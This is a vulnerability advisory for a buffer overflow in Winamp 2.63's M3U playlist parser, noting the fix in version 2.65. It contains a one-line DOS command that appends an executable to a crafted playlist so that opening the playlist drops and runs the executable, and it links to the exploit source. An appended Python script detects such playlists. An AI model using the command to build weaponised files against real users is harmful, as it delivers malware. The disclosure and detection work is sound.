COMMAND

    WinAmp

SYSTEMS AFFECTED

    Winamp 2.63

PROBLEM

    'ByteRage' found the following. He has written a full-disclosure
    exploit for the Winamp 2.63 buffer overflow found in the M3U file
    parser. Attached is a file called DROPPER.M3U. If you execute the
    following command in DOS:

        COPY /B DROPPER.M3U+C:\WINDOWS\CDPLAYER.EXE HACKME.M3U

    and then click HACKME.M3U, the file will drop and execute the
    appended exe file, CDPLAYER.EXE in this case.

    The CPP source for creating DROPPER.M3U is at:

        http://elf.box.sk/byterage/wa263bof.cpp

    and more information is available at:

        http://elf.box.sk/byterage/wa263.htm

    This has not yet been tested on 2.64 or underlying versions, but
    if the versions of IN_MOD.DLL match, those versions are vulnerable
    too.
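
    A triage check for playlists built as described above (an executable
    appended to an M3U with COPY /B), given here as an added example that
    is not part of the original advisory or of ByteRage's code. The
    function names, the sample data and the 260-byte line limit are
    assumptions; the advisory does not state the overflow length.

```python
import struct

MAX_LINE = 260  # assumed triage threshold (Windows MAX_PATH), not from the advisory


def find_pe_offset(data: bytes) -> int:
    """Offset of the first embedded PE image (an MZ header whose e_lfanew
    field points at a 'PE\\0\\0' signature), or -1 if there is none."""
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, pos + 0x3C)
            sig = pos + e_lfanew
            if data[sig:sig + 4] == b"PE\x00\x00":
                return pos
        pos = data.find(b"MZ", pos + 1)
    return -1


def triage_playlist(data: bytes) -> list:
    """Return human-readable findings for one playlist file's raw bytes."""
    findings = []
    pe = find_pe_offset(data)
    if pe != -1:
        findings.append(f"embedded PE image at offset {pe}")
    text = data if pe == -1 else data[:pe]  # only the playlist part is line-checked
    for n, line in enumerate(text.split(b"\n"), 1):
        line = line.rstrip(b"\r")
        if len(line) > MAX_LINE:
            findings.append(f"line {n}: {len(line)} bytes exceeds {MAX_LINE}")
        if any(b < 0x20 and b != 0x09 for b in line):
            findings.append(f"line {n}: control bytes in playlist text")
    return findings


# Constructed sample inputs (not taken from the advisory's attachment).
BENIGN = b"#EXTM3U\r\n#EXTINF:215,Artist - Title\r\nC:\\MUSIC\\TRACK01.MP3\r\n"
# Stand-in for an executable: 64-byte DOS header plus the PE signature only.
FAKE_PE = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64) + b"PE\x00\x00"
APPENDED = BENIGN + FAKE_PE  # same layout that COPY /B a.m3u+b.exe produces
LONG = b"#EXTM3U\r\n" + b"A" * 600 + b".MP3\r\n"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("appended", APPENDED), ("long", LONG)):
        print(name, triage_playlist(blob) or "clean")
```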

SOLUTION

    According to Winamp's whatsnew.txt, this security hole was patched
    in version 2.65.